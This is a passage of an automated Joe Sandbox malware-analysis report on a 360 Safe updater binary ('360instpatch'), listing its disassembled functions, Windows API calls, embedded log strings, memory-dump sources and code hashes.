                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: htonl$_memsetbindhtonssocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2989883027-0
                                                                                                                                                                                                              • Opcode ID: 8b240aa60a612fdc7a044f5149b5bb28e4da8c41158fb9e57686332c86ff2253
                                                                                                                                                                                                              • Instruction ID: 6261ef26074cec9cd9e63f6bc604ad63e0292ba33e32da6978e0146a6a91c2a0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b240aa60a612fdc7a044f5149b5bb28e4da8c41158fb9e57686332c86ff2253
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C117732950219AAEF00DBB4CC45BAE7774AF11750F404596F511E61E0D7B8DA14CBE1
                                                                                                                                                                                                              Function 00B1E080 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00B1E084
                                                                                                                                                                                                              • CreateFileW.KERNEL32 ref: 00B1E0AA
                                                                                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,0022204C,00000000,00000004,00000000,00000004,00000000,00000000), ref: 00B1E0DA
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00B1E0E3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseControlCreateCurrentDeviceFileHandleProcess
                                                                                                                                                                                                              • String ID: \\.\360SelfProtection
                                                                                                                                                                                                              • API String ID: 3778458602-936859468
                                                                                                                                                                                                              • Opcode ID: 8d6b227864b9369c34440a4d52942a08137019cc2b45ccb73828ee706932e6b8
                                                                                                                                                                                                              • Instruction ID: 2434cbf576b5cb587106ddd91f46ccf39de467f25ba3137426d5a9fb8f8bc87e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d6b227864b9369c34440a4d52942a08137019cc2b45ccb73828ee706932e6b8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8AF0A931744310BBE2119754EC06F6E7BA4ABC8F11F440618FB94A71D0D7B4A608C7A7
                                                                                                                                                                                                              Function 00B80145 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B80152
                                                                                                                                                                                                              • FindResourceW.KERNEL32(00000000,?,?,DLL), ref: 00B80163
                                                                                                                                                                                                              • SizeofResource.KERNEL32(00000000,00000000,00000000), ref: 00B80174
                                                                                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 00B80180
                                                                                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 00B8018B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Resource$FindLoadLockSizeof_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3046278646-0
                                                                                                                                                                                                              • Opcode ID: 59e36afb0c7abe5b8f0ffe2276911a941cd0bbf542e03d09fd92a4999c1c7909
                                                                                                                                                                                                              • Instruction ID: dba4878be9da4d713df398fd98cfb6d79e376aedaee0022df41488136cdb0b16
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 59e36afb0c7abe5b8f0ffe2276911a941cd0bbf542e03d09fd92a4999c1c7909
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CBF09072601305BFDB126FA5EC08E5B7FA8FF497A1F004024F91897120DB31D861DBA0
                                                                                                                                                                                                              Function 6BEFA873 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AdaptersCountInfoTick_sprintf
                                                                                                                                                                                                              • String ID: %02X
                                                                                                                                                                                                              • API String ID: 3280268689-436463671
                                                                                                                                                                                                              • Opcode ID: 60edd50907fa7a0f4acd48a66fc6165ae1f8da63333ad6af03f033b52dbbdd3b
                                                                                                                                                                                                              • Instruction ID: 07375db65bba9a5967532bca32bd98e935bc3d99559cc198f354f355d7c1aabd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 60edd50907fa7a0f4acd48a66fc6165ae1f8da63333ad6af03f033b52dbbdd3b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00112972A442948BDB648FB8CC957EEB7FC9F0A348F2014ADD846D7241EB7895079B60
                                                                                                                                                                                                              Function 6BF2FB95 Relevance: 3.0, APIs: 2, Instructions: 35networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: bindhtonl
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2721747176-0
                                                                                                                                                                                                              • Opcode ID: d585bb50ee3a996061f2202fc6d6b187ce26c9b119c02198c73ce4accf85f450
                                                                                                                                                                                                              • Instruction ID: c3491fa8a263aabbe32eee21ba852e498a3f56a37f46c5fe85b2d114b9daba39
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d585bb50ee3a996061f2202fc6d6b187ce26c9b119c02198c73ce4accf85f450
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EFF03076A2020AAFDF40DFB8C912FAF77B5EF15710F404466E802E71A0D774DA049791
                                                                                                                                                                                                              Function 6BF2FEA4 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: listen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3257165821-0
                                                                                                                                                                                                              • Opcode ID: 28d74ebe726d56a8fe5d021f360d327c048693722057a8e05dba7860e0f9fe70
                                                                                                                                                                                                              • Instruction ID: 66ec7a1a633cc91e087bcff4c3c3c1583b1b9ebceffcadf8d678245f7337b74b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 28d74ebe726d56a8fe5d021f360d327c048693722057a8e05dba7860e0f9fe70
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8DD0C972264100DFD7429F60C644A2077B5FF5A71AF2085ECA14D8A1B2C732C867DF00
                                                                                                                                                                                                              Function 6BF26F71 Relevance: 56.3, APIs: 16, Strings: 16, Instructions: 275registryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF26DCB: RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\LiveUpdate360,00000000,000F003F,6BFCC288,00000000,6BF8AC78,74DF30D0,?,6BFCC3F0,6BFCC288), ref: 6BF26DF2
                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,LogLevel,00000000,?,?,?,?,6BF8AC78), ref: 6BF26FE4
                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(?,DnsProxy,00000000,?,?,?,?,6BF8AC78), ref: 6BF27010
                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(?,TFWRate,00000000,?,?,?,?,6BF8AC78), ref: 6BF2703C
                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(?,Intranet,00000000,?,?,?,?,6BF8AC78), ref: 6BF27068
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,ProxyUpdateDate,00000000,?,?,?,?,6BF8AC78), ref: 6BF2709C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryValue$Open
                                                                                                                                                                                                              • String ID: ,%s,$,360sdupd,360tray,360leakfixer,360safe,softmanager,360netcfg,seup,360entclient,softmgr,sdis,$360sdUpd,360tray,360leakfixer,360safe,SoftManager,360netcfg,seup,360EntClient,SoftMgr,Sdis$DnsProxy$Intranet$LogLevel$MaxDnSpeed$MaxUpSpeed$MaxUpUpdate$Nat$NatUpdate$NatWLan$PeerNumPerS$ProxyUpdateDate$TFWRate$UseEntModuleList
                                                                                                                                                                                                              • API String ID: 1606891134-779865806
                                                                                                                                                                                                              • Opcode ID: 7fe16b7db5fb866031b0e0b375e18b8269d3b6be586f53c028a2c785ba7f4874
                                                                                                                                                                                                              • Instruction ID: 1e0256fac5cb83adbdc011bebe4fd8414cc08040c225546e191b22337a0765f2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7fe16b7db5fb866031b0e0b375e18b8269d3b6be586f53c028a2c785ba7f4874
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DFB168B2D1161CAEDB11DFE5CC80DDEB7BCFB09744B20422AE915E7211E7369A058F60
                                                                                                                                                                                                              Function 6BF11979 Relevance: 47.6, APIs: 19, Strings: 8, Instructions: 320registryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 364 6bf11979-6bf119bf call 6bf38390 RegQueryValueExW 367 6bf119c1-6bf119e4 call 6bf3af8e * 2 364->367 368 6bf11a0d-6bf11b09 RegCloseKey call 6bf38390 GetTempPathW call 6bee9134 GetModuleFileNameW call 6bf3af8e call 6bee9134 call 6bee81d2 call 6bf38390 GetModuleFileNameW call 6bf38001 364->368 377 6bf119f1-6bf119f3 367->377 378 6bf119e6-6bf119e8 367->378 398 6bf11b31-6bf11b6a call 6bf3af8e call 6bee9252 call 6bef1768 368->398 399 6bf11b0b-6bf11b2f call 6bf3c2b8 call 6bf38001 368->399 380 6bf119f7-6bf11a02 377->380 382 6bf119f5 377->382 378->380 381 6bf119ea-6bf119ef 378->381 385 6bf11a03-6bf11a08 call 6bee9134 380->385 381->385 382->380 385->368 411 6bf11be5-6bf11be7 398->411 412 6bf11b6c-6bf11baa call 6bef272e call 6bee8fa1 call 6bee8514 call 6bf02547 398->412 399->398 413 6bf11be8-6bf11c30 call 6bee8514 call 6bf38390 SHGetSpecialFolderPathW 411->413 430 6bf11bdd-6bf11be3 412->430 431 6bf11bac-6bf11bdb call 6befb693 call 6bee8fa1 call 6bee8514 412->431 425 6bf11c32 413->425 426 6bf11c35-6bf11c5a wsprintfW call 6befac13 413->426 425->426 434 6bf11c61-6bf11cb6 call 6bf24970 call 6bf38390 call 6befb15a call 6bee9134 426->434 435 6bf11c5c 426->435 430->413 431->413 449 6bf11cb8-6bf11cc4 434->449 450 6bf11cda-6bf11d28 call 6bf272b1 call 6bf23f7c call 6bf0fda4 434->450 435->434 451 6bf11cc6 449->451 452 6bf11ccb-6bf11cd7 call 6bf240cf 449->452 461 6bf11d34-6bf11d72 call 6bf23f7c call 6bf38390 call 6bf53430 450->461 462 6bf11d2a call 6befaeea 450->462 451->452 452->450 470 6bf11d77-6bf11db4 call 6bee9134 call 6bee8514 call 6bf384d6 461->470 466 6bf11d2f 462->466 466->461
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • %s\360Safe\LiveUpdateLog\P2SP%s.log, xrefs: 6BF11C43
                                                                                                                                                                                                              • competition, xrefs: 6BF11CDB
                                                                                                                                                                                                              • p2sp init %s, xrefs: 6BF11CCC
                                                                                                                                                                                                              • 360P2SP.dll, xrefs: 6BF11C98
                                                                                                                                                                                                              • SOFTWARE\360Safe\Leak, xrefs: 6BF11CE0
                                                                                                                                                                                                              • liveupdate360, xrefs: 6BF11B9B
                                                                                                                                                                                                              • [CTaskMgr::__init_global_vars] Loglevel:%u DnsProxy_enable:%u TFWRate:%d ProxyUpdateDate:%u, xrefs: 6BF11D0C
                                                                                                                                                                                                              • LSPKeepCloseNum:%d IsLSPMode:%d, xrefs: 6BF11D40
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcsrchr$_memset$FileModuleName_wcslen$ClosePathQueryTempValue
                                                                                                                                                                                                              • String ID: %s\360Safe\LiveUpdateLog\P2SP%s.log$360P2SP.dll$LSPKeepCloseNum:%d IsLSPMode:%d$SOFTWARE\360Safe\Leak$[CTaskMgr::__init_global_vars] Loglevel:%u DnsProxy_enable:%u TFWRate:%d ProxyUpdateDate:%u$competition$liveupdate360$p2sp init %s
                                                                                                                                                                                                              • API String ID: 1602246604-1275363313
                                                                                                                                                                                                              • Opcode ID: 0e10721624ffc30c2693caf05ec1c9a5141d8318d33b82489c110ab5a2149493
                                                                                                                                                                                                              • Instruction ID: e87fae8c8a29eea847e0bbacfc7aab48c68977bcd7a37562927348f0be29100d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e10721624ffc30c2693caf05ec1c9a5141d8318d33b82489c110ab5a2149493
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97B191B3414199AADF61DFB4CC81EEE37ACEF15308F00056AF905D61A0EB399648C7A2
                                                                                                                                                                                                              Function 6BEEC988 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 332COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 477 6beec988-6beec996 478 6beec998-6beec9bf call 6bf2405e 477->478 479 6beec9c4-6beec9ca 477->479 487 6beecd02-6beecd05 478->487 481 6beec9cc-6beec9f3 call 6bf2405e 479->481 482 6beec9f8-6beec9fb 479->482 495 6beecd01 481->495 485 6beec9fd 482->485 486 6beeca30-6beeca35 482->486 489 6beec9ff-6beeca02 485->489 490 6beeca04-6beeca2b call 6bf2405e 485->490 491 6beeca37-6beeca5e call 6bf2405e 486->491 492 6beeca63-6beeca71 486->492 489->486 489->490 490->495 491->495 493 6beeca9f-6beecaa9 492->493 494 6beeca73-6beeca9a call 6bf2405e 492->494 499 6beecaab-6beecaae 493->499 500 6beecab5-6beecaba 493->500 494->495 495->487 504 6beecac0-6beecac5 499->504 505 6beecab0-6beecab3 499->505 506 6beecabc-6beecabe 500->506 507 6beecad1-6beecad6 500->507 504->507 508 6beecac7-6beecace call 6bf38a33 504->508 505->500 505->504 506->504 506->507 509 6beecad8-6beecaea call 6bf3b048 507->509 510 6beecb25-6beecb34 call 6bf38f39 507->510 508->507 517 6beecb1e-6beecb23 509->517 518 6beecaec-6beecb19 GetLastError call 6bf2405e GetLastError 509->518 519 6beeccff 510->519 520 6beecb3a-6beecb3e 510->520 522 6beecb41-6beecb62 call 6bf3b060 517->522 518->495 519->495 520->522 522->519 526 6beecb68-6beecb6f 522->526 527 6beecbd3-6beecc03 SetFilePointer WriteFile 526->527 528 6beecb71-6beecb75 526->528 529 6beecc09-6beecc0c 527->529 530 6beecda2-6beecdcf GetLastError call 6bf2405e GetLastError 527->530 531 6beecb7c 528->531 532 6beecb77-6beecb7a 528->532 529->530 534 6beecc12-6beecc27 WriteFile 529->534 530->495 533 6beecb7f-6beecb9f CreateFileW 531->533 532->533 533->527 536 6beecba1-6beecbce GetLastError call 6bf2405e GetLastError 533->536 537 6beecc2d-6beecc30 534->537 538 6beecd70-6beecd9d GetLastError call 6bf2405e GetLastError 534->538 536->495 537->538 541 6beecc36-6beecc4b WriteFile 537->541 538->495 544 6beecd41-6beecd6e GetLastError call 6bf2405e GetLastError 541->544 545 6beecc51-6beecc54 541->545 544->495 545->544 548 6beecc5a-6beecc74 call 6bf3b048 545->548 552 6beecc76-6beecc8a GetLastError 548->552 553 6beecca0-6beeccf0 call 6bf3b060 * 3 call 6beeba90 WriteFile 548->553 555 6beecc8c-6beecc8f 552->555 556 6beecc91 552->556 566 6beecd08-6beecd3b GetLastError call 6bf2405e GetLastError call 6bf38a33 553->566 567 6beeccf2-6beeccf6 553->567 557 6beecc94-6beecc9b DeleteFileW 555->557 556->557 559 6beecd3c-6beecd3f 557->559 559->495 566->559 567->566 569 6beeccf8-6beeccfe call 6bf38a33 567->569 569->519
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF2405E: _memset.LIBCMT ref: 6BF24091
                                                                                                                                                                                                                • Part of subcall function 6BF2405E: wvnsprintfW.SHLWAPI(?,000003FF,6BFCC288,6BF0E1F9), ref: 6BF240AC
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEECD0E
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEECD29
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEECD47
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEECD62
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEECD76
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEECD91
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEECDA8
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEECDC3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [%d.] exception raised in method CFileMgr::SetMemFile, error code is %d, xrefs: 6BEECAFB
                                                                                                                                                                                                              • [%d.] exception raised in method CFileMgr::SetMemFile, parameter nNumber must greater than zero, xrefs: 6BEEC9D2, 6BEECA0A, 6BEECA3D, 6BEECA79
                                                                                                                                                                                                              • [%d.] exception raised in method CFileMgr::SetMemFile, parameter pBuffer can not be NULL, xrefs: 6BEEC99E
                                                                                                                                                                                                              • [%d.] exception raised in method CFileMgr::SetMemFile, open file fail, error code is %d, xrefs: 6BEECBB0
                                                                                                                                                                                                              • [%d.] exception raised in method CFileMgr::SetMemFile, read from file fail(call WriteFile), error code is %d, xrefs: 6BEECD17, 6BEECD50, 6BEECD7F, 6BEECDB1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$_memsetwvnsprintf
                                                                                                                                                                                                              • String ID: [%d.] exception raised in method CFileMgr::SetMemFile, error code is %d$[%d.] exception raised in method CFileMgr::SetMemFile, open file fail, error code is %d$[%d.] exception raised in method CFileMgr::SetMemFile, parameter nNumber must greater than zero$[%d.] exception raised in method CFileMgr::SetMemFile, parameter pBuffer can not be NULL$[%d.] exception raised in method CFileMgr::SetMemFile, read from file fail(call WriteFile), error code is %d
                                                                                                                                                                                                              • API String ID: 3354761010-881496342
                                                                                                                                                                                                              • Opcode ID: 96efc3b240105c749ecfc4dbda0f5b29a30b11dfd8a17f769d0e831eedce93f8
                                                                                                                                                                                                              • Instruction ID: 8af1596709bc6881502d48feda937139ff6dde53b1616d111eab80cd7318a021
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 96efc3b240105c749ecfc4dbda0f5b29a30b11dfd8a17f769d0e831eedce93f8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43C19272500A05AFDB11DF79CC81B977BE5FB44304F208819F9AAC2360E77AE5558BB1
                                                                                                                                                                                                              Function 6BF0C7D8 Relevance: 35.6, APIs: 5, Strings: 15, Instructions: 622COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
